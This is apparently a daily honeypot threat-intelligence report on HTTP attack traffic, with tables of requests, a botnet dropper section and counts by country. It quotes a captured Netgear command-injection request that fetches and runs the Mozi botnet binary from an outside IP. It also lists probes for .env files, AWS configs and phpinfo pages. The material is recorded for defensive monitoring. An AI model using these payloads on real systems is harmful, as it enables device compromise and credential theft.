Daily Report: 2025-04-23#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).
There are 46 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1674 requests were recorded during the day, originating from 1 different countries, with a peak of 431 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
GB | Georgia |
CN | Georgia |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
84.53.198.174 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://84.53.198.174:55691/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
25 | 4 | POST /all HTTP/1.1 |
196 | 1 | GET //webpages/login.html HTTP/1.1 |
203 | 1 | POST /api/user/binLookup?time=1745369171337875278 HTTP/1.1 |
204 | 1 | GET /api/bin/440393?time=1745369170835361078 HTTP/1.1 |
239 | 1 | POST /api/user/binLookup?time=1745368665861767786 HTTP/1.1 |
240 | 1 | GET /api/bin/440393?time=1745368665457778723 HTTP/1.1 |
241 | 1 | GET /config/index?time=1745367532087813904 HTTP/1.1 |
247 | 1 | GET /XVhG HTTP/1.1 |
248 | 1 | GET /ZYp9 HTTP/1.1 |
275 | 1 | GET /FwPP HTTP/1.1 |
276 | 1 | GET /UUeM HTTP/1.1 |
282 | 1 | POST /mgmt/tm/util/bash HTTP/1.1 |
306 | 1 | GET /api2/.env HTTP/1.1 |
312 | 1 | GET /core/Database/.env HTTP/1.1 |
320 | 1 | GET /.env.py HTTP/1.1 |
337 | 1 | GET /docker-compose/.env HTTP/1.1 |
338 | 1 | GET /database/backup/.env HTTP/1.1 |
342 | 1 | GET /api/system/.env HTTP/1.1 |
344 | 1 | GET /administrator/config/.env HTTP/1.1 |
345 | 1 | GET /admin/backup/.env HTTP/1.1 |
346 | 1 | GET /admin/db/.env HTTP/1.1 |
349 | 1 | POST /aws.yml HTTP/1.1 |
352 | 1 | POST /_profiler/phpinfo HTTP/1.1 |
355 | 1 | POST /%C0 HTTP/1.1 |
360 | 1 | GET /setting/.env HTTP/1.1 |
367 | 1 | POST /info.php HTTP/1.1 |
368 | 1 | POST /frontend_dev.php HTTP/1.1 |
369 | 1 | POST /frontend/web/debug/default/view HTTP/1.1 |
372 | 1 | POST /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 |
373 | 1 | POST /debug/default/view?panel=config HTTP/1.1 |
374 | 1 | POST /debug/default/view.html HTTP/1.1 |
375 | 1 | POST /debug/default/view HTTP/1.1 |
376 | 1 | POST /config/aws.yml HTTP/1.1 |
377 | 1 | POST /config.js HTTP/1.1 |
381 | 1 | POST /symfony/public HTTP/1.1 |
383 | 1 | POST /sapi/debug/default/view HTTP/1.1 |
389 | 1 | POST /phpinfo.php HTTP/1.1 |
390 | 1 | POST /phpinfo HTTP/1.1 |
397 | 1 | GET /api/bin/440393?time=1745368639584839159 HTTP/1.1 |
398 | 1 | GET /config/index?time=1745367509457219171 HTTP/1.1 |
406 | 1 | POST /wp-config.php-backup HTTP/1.1 |
407 | 1 | POST /web/debug/default/view HTTP/1.1 |
411 | 1 | POST /tool/view/phpinfo.view.php HTTP/1.1 |
412 | 1 | POST /symfony/public/_profiler/phpinfo HTTP/1.1 |
428 | 1 | POST /api/user/binLookup?time=1745368640010425730 HTTP/1.1 |
541 | 1 | GET /config/index?time=1745368057477993246 HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 431 | US |
1 | 429 | GB |
2 | 142 | NL |
3 | 124 | SC |
4 | 110 | PL |
5 | 96 | DE |
6 | 79 | HK |
7 | 71 | CN |
8 | 33 | CA |
9 | 16 | TW |
10 | 15 | JP |
11 | 14 | FR |
12 | 14 | IN |
13 | 12 | UA |
14 | 12 | KR |
15 | 7 | AU |
16 | 6 | PT |
17 | 6 | MY |
18 | 6 | BE |
19 | 5 | ZA |
20 | 4 | SG |
21 | 4 | VE |
22 | 4 | IT |
23 | 4 | AO |
24 | 3 | TR |
25 | 3 | RO |
26 | 3 | BR |
27 | 3 | ID |
28 | 3 | RU |
29 | 2 | IL |
30 | 2 | MC |
31 | 2 | VN |
32 | 2 | TH |
33 | 1 | NP |
34 | 1 | ES |
35 | 1 | BG |
36 | 1 | EE |
37 | 1 | IR |
38 | 1 | SK |
39 | 1 | SE |